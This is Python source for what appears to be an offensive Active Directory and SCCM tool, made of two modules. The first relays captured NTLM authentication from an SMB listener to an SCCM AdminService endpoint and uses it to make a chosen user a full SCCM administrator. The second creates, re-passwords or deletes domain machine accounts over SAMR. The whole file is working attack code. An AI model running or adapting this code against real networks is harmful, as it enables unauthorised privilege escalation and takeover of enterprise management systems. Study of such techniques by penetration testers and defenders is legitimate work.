import base64
import time
import json
import ssl
import sys
import urllib.parse
import os
from struct import unpack
from threading import Lock

from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
from impacket.examples.ntlmrelayx.clients.httprelayclient import HTTPSRelayClient
from impacket.examples.ntlmrelayx.servers import SMBRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
from impacket.nt_errors import STATUS_ACCESS_DENIED, STATUS_SUCCESS
from impacket.ntlm import NTLMAuthChallengeResponse
from impacket.spnego import SPNEGO_NegTokenResp

try:
    from http.client import HTTPConnection, HTTPSConnection
except ImportError:
    from httplib import HTTPConnection, HTTPSConnection


from lib.logger import logger

ELEVATED = []
SUCCESS = False

def jprint(obj):
    json_data = json.loads(obj)
    text = json.dumps(json_data, sort_keys=True, indent=4)
    print(text)
    return
    
class SCCMHTTPSRelayClient(HTTPSRelayClient):
    PLUGIN_NAME = "HTTPS"
    def initConnection(self):
        self.lastresult = None
        if self.target.path == '':
            self.path = '/'
        else:
            self.path = self.target.path
        self.query = self.target.query
        try:
            uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            self.session = HTTPSConnection(self.targetHost,self.targetPort, context=uv_context)
        except AttributeError:
            self.session = HTTPSConnection(self.targetHost,self.targetPort)
        return True

    def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
        self.SCCM_relay.attack_lock.acquire()
        try:
            response = self._sendAuth(authenticateMessageBlob, serverChallenge)
        except Exception as e:
            logger.info(f"Something went wrong:\n{e}")
            response = None, STATUS_ACCESS_DENIED
        finally:
            self.SCCM_relay.attack_lock.release()
            return response

    def _sendAuth(self, authenticateMessageBlob, serverChallenge=None):
        global SUCCESS
        
        if (
            unpack("B", authenticateMessageBlob[:1])[0]
            == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP
        ):
            respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
            token = respToken2["ResponseToken"]
        else:
            token = authenticateMessageBlob

        try:
            response = NTLMAuthChallengeResponse()
            response.fromString(data=token)

            domain = response["domain_name"].decode("utf-16le")
            username = response["user_name"].decode("utf-16le")

            self.user = "%s\\%s" % (domain, username)
            self.session.user = self.user
            if self.user not in ELEVATED:
                ELEVATED.append(self.user)
                logger.info(f"Authenticating with user: {self.user}")
                
                auth = base64.b64encode(token).decode("ascii")
                headers = {'Authorization':'%s %s' % ('Negotiate', auth),'Content-Type': 'application/json; odata=verbose'}
                
                data = {
                    "LogonName": self.SCCM_relay.target_user, 
                    "AdminSid": self.SCCM_relay.target_sid,
                    "Permissions": [
                        {
                            "CategoryID": "SMS00ALL", 
                            "CategoryTypeID": 29, 
                            "RoleID":"SMS0001R",
                        },
                        {
                            "CategoryID": "SMS00001",
                            "CategoryTypeID": 1, 
                            "RoleID":"SMS0001R", 
                        },
                        {
                            "CategoryID": "SMS00004", 
                            "CategoryTypeID": 1, 
                            "RoleID":"SMS0001R",
                        }
                    ],
                    "DisplayName": self.SCCM_relay.target_user
                }

                body = json.dumps(data) 

                self.session.request("POST", self.path, headers=headers, body=body)
                res = self.session.getresponse()
                response_data = res.read()
                if res.status == 201:
                    logger.info("Attack successful")
                    logger.info(f"Target user {self.SCCM_relay.target_user} added as an SCCM admin")
                    response_content = response_data.decode('utf-8')
                    logger.debug(f"Response data:")
                    jprint(response_content)
                    SUCCESS = True
                    return
                if res.status == 401:
                    logger.info("Got unauthorized response from SCCM AdminService")
                    SUCCESS = True
                    return
                else:
                    logger.info(f"Unexpected status code: {res.status}")
                    logger.debug(f"Response data: {response_data.decode('utf-8', errors='ignore')}")
                    SUCCESS = True
                    return
        except Exception as e:
            logger.info(f"Something went wrong:\n{e}")
            SUCCESS = True
            return
        
        

class HTTPSCCMRELAY:
    def __init__(self, target:str, target_user:str, target_sid:str, interface:str, port:int, timeout:int, verbose:bool,
    ):
        self.target = f"https://{target}/AdminService/wmi/SMS_Admin"
        self.interface = interface
        self.port = port
        self.timeout = timeout
        self.attacked_targets = []
        self.attack_lock = Lock()
        self.server = None
        self.headers = None
        self.session_info = None
        self.verbose = verbose
        self.target_user = target_user
        self.target_sid = target_sid

        logger.info("Targeting SCCM AdminService at %s" % self.target)

        target_processor = TargetsProcessor(
            singleTarget=self.target, 
            protocolClients={"HTTPS": self.get_relay_https_client}
        )
        config = NTLMRelayxConfig()
        config.setTargets(target_processor)
        config.setProtocolClients({"HTTPS": self.get_relay_https_client})
        config.setListeningPort(port)
        config.setInterfaceIp(interface)
        config.setSMB2Support(True)
        config.setMode("RELAY")

        self.server = SMBRelayServer(config)

    def start(self):
        """All taken from Certipy's relay implementation https://github.com/ly4k/Certipy"""
        logger.info("Listening on %s:%d" % (self.interface, self.port))
        logger.info("Waiting for incoming connections...")

        self.server.start()

        start_time = time.time()
        
        try:
            # Main loop with timeout check
            while not SUCCESS:                    
                time.sleep(0.1)
                
        except KeyboardInterrupt:
            logger.info("Keyboard interrupt received, exiting...")
        except Exception as e:
            logger.error(f"Error in main loop: {e}")
        finally:
            self.exit()

    def get_relay_https_client(self, *args, **kwargs):
        relay_client = SCCMHTTPSRelayClient(*args, **kwargs)
        relay_client.SCCM_relay = self
        return relay_client

    def exit(self):
        logger.info("Job's done")
        
        # Properly shutdown the SMB server
        if self.server:
            try:
                # Try to properly shutdown the underlying socketserver
                if hasattr(self.server.server, 'shutdown'):
                    logger.debug("Shutting down socket server...")
                    self.server.server.shutdown()
                    
                # For older Python versions or different server implementations
                if hasattr(self.server.server, 'socket'):
                    logger.debug("Closing server socket...")
                    self.server.server.socket.close()
                    
                # Set server to None to release references
                self.server = None
                logger.debug("Server reference cleared")
                
            except Exception as e:
                logger.debug(f"Error during server shutdown: {e}")
        
        # Force exit to ensure no hanging threads
        logger.info("Exiting...")
        os._exit(0)
        


from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket.dcerpc.v5 import samr, epm, transport
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
import logging
import sys
import string
import random
import ssl
import os
from binascii import unhexlify
from lib.logger import logger as sccmlogger

class AddComputerSAMR:

    def __init__(self, username, password, domain, hashes, aes, kerberos, dc_ip, computer_name=None,computer_pass=None):

        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__hashes = hashes
        self.__aesKey = aes
        self.__doKerberos = kerberos
        self.__target = dc_ip
        self.__kdcHost = dc_ip
        self.__computerName = computer_name
        self.__computerPassword = computer_pass
        self.__method = 'SAMR'
        self.__port = None
        self.__domainNetbios = None
        self.__noAdd = False
        self.__delete = False
        self.__targetIp = dc_ip

        if self.__targetIp is not None:
            self.__kdcHost = self.__targetIp


        if self.__doKerberos and self.dc_host is None:
            raise ValueError("Kerberos auth requires DNS name of the target DC. Use -dc-host.")


        if self.__hashes is not None:
            self.__lmhash, self.__nthash = self.__hashes.split(':')

        if self.__computerPassword is None:
            self.__computerPassword = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))

        if self.__target is None:
            self.__target = self.__domain

        if self.__port is None:
            if self.__method == 'SAMR':
                self.__port = 445
            elif self.__method == 'LDAPS':
                self.__port = 636

        if self.__domainNetbios is None:
            self.__domainNetbios = self.__domain



    def run_samr(self):
        if self.__targetIp is not None:
            stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
        else:
            stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
        rpctransport = transport.DCERPCTransportFactory(stringBinding)
        rpctransport.set_dport(self.__port)

        if self.__targetIp is not None:
            rpctransport.setRemoteHost(self.__targetIp)
            rpctransport.setRemoteName(self.__target)

        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
                                         self.__nthash, self.__aesKey)

        rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
        self.doSAMRAdd(rpctransport)

    def generateComputerName(self):
        return 'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')

    def doSAMRAdd(self, rpctransport):
        dce = rpctransport.get_dce_rpc()
        servHandle = None
        domainHandle = None
        userHandle = None
        try:
            dce.connect()
            dce.bind(samr.MSRPC_UUID_SAMR)

            samrConnectResponse = samr.hSamrConnect5(dce, '\\\\%s\x00' % self.__target,
                samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN )
            servHandle = samrConnectResponse['ServerHandle']

            samrEnumResponse = samr.hSamrEnumerateDomainsInSamServer(dce, servHandle)
            domains = samrEnumResponse['Buffer']['Buffer']
            domainsWithoutBuiltin = list(filter(lambda x : x['Name'].lower() != 'builtin', domains))

            if len(domainsWithoutBuiltin) > 1:
                domain = list(filter(lambda x : x['Name'].lower() == self.__domainNetbios, domains))
                if len(domain) != 1:
                    logging.critical("This server provides multiple domains and '%s' isn't one of them.", self.__domainNetbios)
                    logging.critical("Available domain(s):")
                    for domain in domains:
                        logging.error(" * %s" % domain['Name'])
                    logging.critical("Consider using -domain-netbios argument to specify which one you meant.")
                    raise Exception()
                else:
                    selectedDomain = domain[0]['Name']
            else:
                selectedDomain = domainsWithoutBuiltin[0]['Name']

            samrLookupDomainResponse = samr.hSamrLookupDomainInSamServer(dce, servHandle, selectedDomain)
            domainSID = samrLookupDomainResponse['DomainId']

            if logging.getLogger().level == logging.DEBUG:
                logging.info("Opening domain %s..." % selectedDomain)
            samrOpenDomainResponse = samr.hSamrOpenDomain(dce, servHandle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER , domainSID)
            domainHandle = samrOpenDomainResponse['DomainHandle']


            if self.__noAdd or self.__delete:
                try:
                    checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                except samr.DCERPCSessionError as e:
                    if e.error_code == 0xc0000073:
                        raise Exception("Account %s not found in domain %s!" % (self.__computerName, selectedDomain))
                    else:
                        raise

                userRID = checkForUser['RelativeIds']['Element'][0]
                if self.__delete:
                    access = samr.DELETE
                    message = "delete"
                else:
                    access = samr.USER_FORCE_PASSWORD_CHANGE
                    message = "set password for"
                try:
                    openUser = samr.hSamrOpenUser(dce, domainHandle, access, userRID)
                    userHandle = openUser['UserHandle']
                except samr.DCERPCSessionError as e:
                    if e.error_code == 0xc0000022:
                        raise Exception("User %s doesn't have right to %s %s!" % (self.__username, message, self.__computerName))
                    else:
                        raise
            else:
                if self.__computerName is not None:
                    try:
                        checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                        raise Exception("Account %s already exists!" % self.__computerName)
                    except samr.DCERPCSessionError as e:
                        if e.error_code != 0xc0000073:
                            raise
                else:
                    foundUnused = False
                    while not foundUnused:
                        self.__computerName = self.generateComputerName()
                        try:
                            checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                        except samr.DCERPCSessionError as e:
                            if e.error_code == 0xc0000073:
                                foundUnused = True
                            else:
                                raise

                try:
                    createUser = samr.hSamrCreateUser2InDomain(dce, domainHandle, self.__computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE,)
                except samr.DCERPCSessionError as e:
                    if e.error_code == 0xc0000022:
                        print("[-] User %s doesn't have right to create a machine account!" % self.__username)
                        sys.exit()
                    elif e.error_code == 0xc00002e7:
                        print("[-] User %s machine quota exceeded!" % self.__username)
                        sys.exit()
                    else:
                        raise
                except Exception as e:
                    if str(e) == "Relayed user machine quota exceeded!":
                        sccmlogger.error("[-] User %s machine quota exceeded!" % self.__username)
                        sys.exit(1)
                    else:
                        sccmlogger.error("[-] Failed to create machine account: %s" % str(e))
                        sys.exit(1)

                userHandle = createUser['UserHandle']

            if self.__delete:
                samr.hSamrDeleteUser(dce, userHandle)
                logging.info("Successfully deleted %s." % self.__computerName)
                userHandle = None
            else:
                samr.hSamrSetPasswordInternal4New(dce, userHandle, self.__computerPassword)
                if self.__noAdd:
                    logging.info("Successfully set password of %s to %s." % (self.__computerName, self.__computerPassword))
                else:
                    checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                    userRID = checkForUser['RelativeIds']['Element'][0]
                    openUser = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, userRID)
                    userHandle = openUser['UserHandle']
                    req = samr.SAMPR_USER_INFO_BUFFER()
                    req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation
                    req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                    samr.hSamrSetInformationUser2(dce, userHandle, req)
                    logging.info("Successfully added machine account %s with password %s." % (self.__computerName, self.__computerPassword))

        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()

            logging.critical(str(e))
        finally:
            if userHandle is not None:
                samr.hSamrCloseHandle(dce, userHandle)
            if domainHandle is not None:
                samr.hSamrCloseHandle(dce, domainHandle)
            if servHandle is not None:
                samr.hSamrCloseHandle(dce, servHandle)
            dce.disconnect()

    def run(self,delete=False):
        self.__delete = delete
        self.run_samr()
